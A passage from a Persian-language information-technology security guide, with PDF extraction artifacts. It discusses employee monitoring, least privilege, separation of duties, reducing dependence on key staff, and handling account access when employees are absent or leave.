‫ﺍﻳﻨﻜﻪ ﺗﺤﺖ ﻧﻈﺮ ﻫﺴﺘﻨﺪ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ‬
‫ﺩﺍﺩﻩ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭﻗﺘﻲ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺷﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﻼ ﺍﮔﺮ ﺷﻤﺎ‬
‫ﻛﺎﺭﺍﻳﻲ ﻛﻤﺘﺮ ﻭ ﺭﻓﺘﺎﺭ ﻧﺎﻣﻨﺎﺳﺒﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪ .‬ﻣﺜ ﹰ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﺯﻣﺎﻥ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﺍﺯ ﺁﻥ‬
‫ﺑﺎﺯﺩﻳﺪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒـﺎﺭ ﺑـﻪ ﺍﺳـﺘﺮﺍﺣﺖ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫ﻼ ﺻﺤﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺁﻧﻬـﺎﻳﻲ ﻫـﺴﺘﻨﺪ‬
‫ﻛﺎﻣ ﹰ‬
‫ﻛﻪ ﺑﺎ ﻧﻈﺮ ﻣﺴﺎﻋﺪ ﻭ ﺗﺸﺮﻳﻚ ﻣﺴﺎﻋﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﺪﻭﻳﻦ ﺷـﻮﻧﺪ ﻭ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻫﻢ )ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺨﺸﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ(‬
‫ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺁﻥ ﺣﻀﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪١٦٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ‬
‫ﺍﺻﻮﻝ ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ ﺭﺍ ﺑﻪ ﺩﻗـﺖ ﺩﺭﻧﻈـﺮ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﺍﺻﻮﻝ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻛـﺎﺭﺁﻳﻲ ﺧـﻮﺩ ﺭﺍ ﺛﺎﺑـﺖ‬
‫ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷـﻨﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ‬
‫ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ‬
‫ﺍﻳﻦ ﺍﺻﻞ ﺑﺮ ﺍﻳﻦ ﻣﺒﻨﺎ ﺍﺳـﺘﻮﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﻗـﺖ‬
‫ﻭﻇــﺎﻳﻒ ﺍﻓــﺮﺍﺩ ﺭﺍ ﺍﺯ ﻫــﻢ ﺟــﺪﺍ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﺍﻳﻨــﺼﻮﺭﺕ ﻛــﺴﺎﻧﻴﻜﻪ‬
‫ﻋﻬﺪﻩﺩﺍﺭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻫﺴﺘﻨﺪ ﺧﻮﺩ ﻫﻢ ﻧﺨﻮﺍﻫﻨـﺪ‬
‫ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻛﻨﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻭﺍﮔـﺬﺍﺭ‬
‫ﻛﺮﺩﻥ ﻫﻤﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺘﻲ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺗﻨﻬـﺎ‬
‫ﻳﻜﻨﻔﺮ ﻛﺎﺭ ﺧﻄﺮﻧﺎﻛﻲ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺷﻮﺩ ﻛﻪ ﺁﻥ ﺷـﺨﺺ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳـﺮﭘﻴﭽﻲ ﻛﻨـﺪ ﻭ‬
‫ﻣﺮﺗﻜﺐ ﻛﺎﺭﻫـﺎﻱ ﻣﻤﻨﻮﻋـﻪ ﺷـﻮﺩ؛ ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻫﻴﭽﻜﺲ ﺟﺰ ﺧﻮﺩ ﺍﻭ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫـﺎ ﺭﺍ‬
‫ﻧﻤﻲﺧﻮﺍﻧﺪ ﻭ ﻟﺬﺍ ﻧﺎﻓﺮﻣﺎﻧﻲ ﻭﻱ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﺑﺎﻗﻲ ﻣـﻲﻣﺎﻧـﺪ ﻭ‬
‫ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺑﺎﺯ ﻫﻢ ﺗﻜﺮﺍﺭ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪﻱ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬
‫ﻫﻴﭽﻜﺲ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻧﺒﺎﻳـﺪ ﻏﻴﺮﻗﺎﺑـﻞ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷـﺪ‬
‫ﭼﺮﺍﻛﻪ ﻫﻴﭻ ﺍﻧﺴﺎﻧﻲ ﺟﺎﻭﺩﺍﻧﻪ ﻭ ﻫﻤﻴﺸﮕﻲ ﻧﻴﺴﺖ‪ .‬ﺍﮔﺮ ﺑﻘﺎﻱ ﻳـﻚ‬
‫ﺳﺎﺯﻣﺎﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺭﻭﺯﺍﻧﺔ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ ﻛﻠﻴـﺪﻱ ﺑﺎﺷـﺪ‪،‬‬
‫ﺑﺪﻭﻥ ﺷﻚ ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ‬
‫ﺍﻣﻨﻴﺖ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣـﻮﺍﻗﻌﻲ ﭼـﻮﻥ ﺑﻴﻤـﺎﺭﻱ ﻳـﺎ ﺍﺧـﺮﺍﺝ‬
‫ﻧﺎﮔﻬﺎﻧﻲ ﺍﻓﺮﺍﺩ ﻛﻠﻴـﺪﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎﻱ ﻣﻜﺘـﻮﺑﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ ﺍﺯ ﺁﻥ ﻃﺮﺣﻬﺎ ﺑﻬﺮﻩ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﻛﻪ ﮔﺰﺍﺭﺵ ﺁﻥ ﺑﺪﺳﺖ ﻣﺎ ﺭﺳﻴﺪﻩ‪ ،‬ﻳﻚ ﺷﺮﻛﺖ ﺑـﺎ‬
‫ﺣﺪﻭﺩ ‪ ۱۰۰‬ﻛﺎﺭﻣﻨـﺪ ﺑـﻴﺶ ﺍﺯ ‪ ۱۰‬ﺳـﺎﻝ ﻭﻗـﺖ ﺻـﺮﻑ ﺗـﺪﻭﻳﻦ‬
‫ﺲ ﺍﻭ ﻳـﻚ ﺭﻭﺯ ﺩﺭ ﺭﺍﻩ ﺩﭼـﺎﺭ ﻳـﻚ‬
‫ﺍﮔﺮ ﻣﺪﻳﺮ ‪ MIS‬ﻭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ‬
‫ﺗﺼﺎﺩﻑ ﻣﺮﮔﺒﺎﺭ ﻣﻲﺷﺪﻧﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣـﻲﺍﻓﺘـﺎﺩ؟ ﺍﮔـﺮ ﺑـﻪ ﻣـﺪﻳﺮ‬
‫‪ MIS‬ﺷﻐﻠﻲ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎ ﺣﻘﻮﻕ ﭼﻨﺪﺑﺮﺍﺑﺮ ﭘﻴﺸﻨﻬﺎﺩ ﻣـﻲﺷـﺪ ﭼـﻪ‬
‫ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﻣﻲﺩﺍﺩ؟ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﺑﺨـﺎﻃﺮ ﻧﻴـﺎﺯ ﺷـﺮﻛﺖ ﺑـﻪ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺍﻭ ﺩﺭ ﭘﺴﺖ ﺧﻮﺩ ﻧﻤﻲﺗﻮﺍﻧﺴﺖ ﺍﺭﺗﻘﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ ﭘﻴـﺪﺍ‬
‫ﻛﻨﺪ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺩﻟـﺴﺮﺩ ﻭ ﻋـﺼﺒﺎﻧﻲ ﻣـﻲﺷـﺪ‬
‫ﭼﻄﻮﺭ؟‬
‫ﺍﻳﻨﻜﻪ ﭘﺮﺳﻨﻞ ﺍﺻﻠﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺷﻮﻧﺪ ﻳﻜﻲ ﺍﺯ ﻣﻌﺎﻳﺐ ﻭ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷـﻮﺩ ‪ -‬ﻭ‬
‫ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻨﺪﺭﺕ ﺑﻪ ﺍﻳﻦ ﻫﺰﻳﻨـﻪ ﻫـﺎ ﺗﻮﺟـﻪ ﻛـﺎﻓﻲ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﻳﻜـﻲ ﺩﻳﮕـﺮ ﺍﺯ ﺩﻻﻳـﻞ ﺑﻜـﺎﺭﮔﻴﺮﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺣﺎﺿﺮ ﻭ ﺁﻣﺎﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻧﻮﺷﺘﺎﺭﻱ ‪ -‬ﺑﻄﻮﺭﻳﻜﻪ ﻳﻚ ﻓﺮﺩ ﺗﺎﺯﻩﻭﺍﺭﺩ ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﺣﺘﻲ ﺟﺎﻳﮕﺰﻳﻦ‬
‫ﻧﻔﺮ ﻗﺒﻠﻲ ﺷﻮﺩ ‪ -‬ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻏﻴﺒﺖ ﻭ ﺗﺮﻙ ﺷﻐﻞ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺑﺎ ﻣﻴﻞ ﻭ ﺍﺭﺍﺩﺓ ﺷﺨﺼﻲ ﺧﻮﺩ )ﻣﺜﻞ ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ‬
‫ﺑﻬﺘﺮ ﺷﻐﻠﻲ( ﻭ ﮔﺎﻫﻲ ﺑﺼﻮﺭﺕ ﻏﻴﺮﺩﺍﻭﻃﻠﺒﺎﻧـﻪ )ﻣﺜـﻞ ﻭﻗـﻮﻉ ﻣـﺮﮒ ﻳـﺎ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ( ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺗﺮﻙ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ‬
‫ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻓﺮﺍﺩ ﺑﻪ ﻣﺴﺎﻓﺮﺕ ﻣﻲﺭﻭﻧﺪ ﻭ ﻳـﺎ ﺑـﺪﻻﻳﻞ‬
‫ﺧﺎﻧﻮﺍﺩﮔﻲ ﻭ ﺷﺨﺼﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﭼﻨﺪ ﺭﻭﺯ ﺍﺯ ﺍﺩﺍﺭﻩ ﻏﻴﺒﺖ‬
‫ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﻳـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ‬
‫ﺭﻭﺍﻟﻬﺎ ﺑﺮﺍﻱ ﮔﺮﺩﺵ ﻛﺎﺭ ﺩﺭ ﺷﺮﺍﻳﻂ ﻏﻴﺒﺖ ﻳﺎ ﺗﺮﻙ ﺷﻐﻞ ﺗﻌﺮﻳـﻒ‬
‫ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻮﻋﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺮﺍﺣﻠﻲ ﭼـﻮﻥ ﺗﻌﻠﻴـﻖ‬
‫ﺣﺴﺎﺑﻬﺎ )ﺍﻟﺒﺘﻪ ﻧـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻏﻴﺒـﺖ(‪ ،‬ﺗﺨـﺼﻴﺺ ﻛﺎﺭﻫـﺎﻱ ﻓـﺮﺩ ﺑـﻪ‬
‫ﻛﺎﺭﻛﻨــﺎﻥ ﺩﻳﮕــﺮ‪ ،‬ﺗﻐﻴﻴــﺮ ﺭﻣــﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺣــﺴﺎﺱ‪ ،‬ﺑﺮﺭﺳــﻲ‬
‫‪Management Information Systems‬‬
‫‪98‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻳﻦ ﺍﺻﻞ ﻣﻲﮔﻮﻳﺪ ﻛﻤﺘﺮﻳﻦ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺭﺍ‬
‫ﻲ ﻣﺤﺪﻭﺩﺷـﺪﻩ‪ ،‬ﻫـﻢ ﺷـﺎﻣﻞ‬
‫ﺑﻪ ﻫﺮ ﻓـﺮﺩ ﺑﺪﻫﻴـﺪ‪ .‬ﺍﻳـﻦ ﺩﺳﺘﺮﺳـ ﹺ‬
‫ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺍﺳﺖ )ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺷـﺒﻜﻪﻫـﺎ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ( ﻭ ﻫﻢ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ )ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‪ ،‬ﻧﻮﺍﺭﻫـﺎﻱ‬
‫ﭘــﺸﺘﻴﺒﺎﻥ ﻭ ﺳــﺎﻳﺮ ﺗﺠﻬﻴ ـﺰﺍﺕ ﺟــﺎﻧﺒﻲ(‪ .‬ﺍﮔــﺮ ﻫ ـﺮ ﻛــﺎﺭﺑﺮ ﺭﻭﻱ ﻫﻤــﺔ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻣﻨﺎﺑﻊ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻧﻈـﺮ ﻣﻴـﺰﺍﻥ ﺗﻬﺪﻳـﺪ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﻳﻜﺴﺎﻥ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﮔﻤﺮﻛﻲ ﺧﻮﺩ ﻭ ﻭﺍﺭﺩﺍﺕ ﺳﻔﺎﺭﺷﺎﺕ ﻧﻤﻮﺩ‪ .‬ﺍﻳﻦ‬
‫ﺳﻴﺴﺘﻢ ﺑﺎ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻛﻪ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ‬
‫ﻧﺒﻮﺩ ﺗﻬﻴﻪ ﺷﺪ ﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺁﻧﺮﺍ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﻮﺩ ﭘـﺲ ﺍﺯ ﻣـﺪﺕ‬
‫ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭ ﺗﺠﺎﺭﺕ ﺭﺍ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺖ‪ .‬ﺩﺭ ﺁﻥ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﺩﻭ ﻧﻔﺮ‬
‫ﺑﻪ ﻧﺤـﻮﺓ ﻛـﺎﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺁﺷـﻨﺎ ﺑﻮﺩﻧـﺪ‪ :‬ﻣـﺪﻳﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺲ ﺍﻭ‪ .‬ﺍﻳـﻦ ﺩﻭ ﻧﻔـﺮ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺪﻳﺮﻳﺖ )‪ ٩٨(MIS‬ﻭ ﻧﻴﺰ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ‬
‫ﻣﺴﺌﻮﻝ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺳﻴـﺴﺘﻢ ﺣـﺴﺎﺑﺪﺍﺭﻱ‪،‬‬
‫ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﮔﺰﺍﺭﺷـﺎﺕ ﺳـﺎﻻﻧﻪ‪ ،‬ﺗﻌﻤﻴـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﺍﺯﻛﺎﺭﺍﻓﺘـﺎﺩﺓ‬
‫ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﺣﺘﻲ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ )ﻛـﻪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃـﺔ‬
‫ﺍﺩﺍﺭﻱ ﺷﺮﻛﺖ ﻭ ﺩﺭ ﺩﻓﺘﺮ ﻣﺪﻳﺮ ‪ MIS‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ( ﺑﻮﺩﻧﺪ‪.‬‬
‫‪١٦٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺻﻨﺪﻭﻗﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ؛ ﻭ ﻳﺎ ﻗﻄﻊ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﺗﻤـﺎﻡ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻛﺎﺭﻫـﺎ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ‪،‬‬
‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻞ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺗﺎ ﻣﺎﻫﻬﺎ ﻳﺎ ﺳﺎﻟﻬﺎ‬
‫ﻼ‬
‫ﺑﻌﺪ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻠﻲ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ )ﻣـﺜ ﹰ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺍﺳـﺎﺗﻴﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﺩﺍﺭﺍﺕ ﻧﻴـﺰ ﺍﮔـﺮ ﻳﻜـﻲ ﺍﺯ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺳﻔﺮ ﺑﺎﺷﺪ ﻳﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﻴﻤﺎﺭﻱ ﻏﻴﺒﺖ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ‬
‫)ﺍﻟﺒﺘﻪ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﺭﻭﺯ(‪ ،‬ﺣـﺴﺎﺑﻬﺎﻱ ﺍﻭ ﻧﺒﺎﻳـﺪ ﻣـﺴﺪﻭﺩ ﻭ ﺭﻣﺰﻫـﺎﻱ‬
‫ﻋﺒﻮﺭﺵ ﻧﺒﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﻗﻊ ﺗـﺮﻙ ﺷـﻐﻞ ﺑـﺴﻴﺎﺭ ﻧﺎﮔﻬـﺎﻧﻲ ﻭ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ‬
‫ﺍﺳــﺖ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺷــﺮﺍﻳﻂ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻓــﺮﺩﻱ ﺩﺭ ﻣﺤــﻞ ﻛــﺎ ﹺﺭ‬
‫ﻛﺎﺭﻣﻨﺪﻱ ﻛﻪ ﺗﺮﻙ ﺷﻐﻞ ﻛﺮﺩﻩ ﺣﺎﺿﺮ ﺷﻮﺩ ﺗﺎ ﺍﺯ ﺗﻌﻮﻳﺾ ﻗﻔﻠﻬـﺎ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﺪ ﻭ ﻳﻚ ﻣﺄﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺟﻌﺒﻪﺍﻱ ﺣﺎﻭﻱ‬
‫ﻭﺳﺎﻳﻞ ﺷﺨﺼﻲ ﻭﻱ ﻛﻪ ﺩﺍﺧﻞ ﻛﺸﻮﻱ ﻣﻴﺰ ﻛﺎﺭﺵ ﺑﻮﺩﻩﺍﻧـﺪ ﺑـﻪ‬
‫ﻼ ﺣـﺬﻑ ﺷـﺪﻩ‪ ،‬ﺗﻤـﺎﻣﻲ‬
‫ﺑﺪﺭﻗﺔ ﺍﻭ ﺑﺮﻭﺩ‪ .‬ﺣﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺍﻭ ﻗـﺒ ﹰ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﻭ ﺗﻠﻔﻨﻬﺎﻱ ﺩﻓﺘﺮ ﻭﻱ ﻧﻴـﺰ‬
‫ﺩﻳﮕﺮ ﻭﺻﻞ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺷﻜﻞ ﻣـﺪﻳﺮﻳﺖ ﺟـﺪﺍﺋﻲ‪ ٩٩‬ﺩﺭ ﺻـﻨﺎﻳﻊ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺴﻴﺎﺭ ﻣﻌﻤﻮﻝ ﺍﺳﺖ ﻭ ﺑﺨﺸﻲ ﺍﺯ ﻣﺸﺎﻏﻞ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻧﻲ ﻫـﺴﺘﻨﺪ‬
‫ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺑﺨﺶ ﻣﻌﻤﻮ ﹰ‬
